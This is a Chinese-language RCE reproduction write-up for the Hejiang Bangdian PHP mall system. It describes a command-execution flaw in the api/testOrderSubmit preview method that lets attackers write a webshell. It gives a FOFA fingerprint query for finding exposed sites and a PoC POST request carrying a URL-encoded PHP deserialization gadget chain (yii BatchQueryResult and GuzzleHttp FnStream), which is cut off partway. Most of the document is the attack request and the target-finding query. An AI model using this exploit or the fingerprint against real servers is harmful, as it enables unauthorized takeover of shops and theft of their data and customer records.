禾匠榜店商城系统 RCE漏洞复现

0x01 产品简介

禾匠榜店商城系统是浙江禾匠信息科技有限公司的一套基于PHP和MySQL的商城系统。

0x02 漏洞概述

禾匠榜店商城系统的api/testOrderSubmit模块下的preview方法存在命令执行漏洞，攻击者可以向服务器写入木马文件，直接获取服务器权限

0x03 漏洞概述

FOFA：body="const _scriptUrl"

0x04 漏洞复现

PoC

POST /web/index.php?r=api/testOrderSubmit/index/preview&_mall_id=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 913
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
Connection: closeform_data=O%3A23%3A%22yii%5Cdb%5CBatchQueryResult%22%3A1%3A%7Bs%3A36%3A%22%00yii%5Cdb%5CBatchQueryResult%00_dataReader%22%3BO%3A24%3A%22GuzzleHttp%5CPsr7%5CFnStream%22%3A3%3A%7Bs%3A32%3A%22%00GuzzleHttp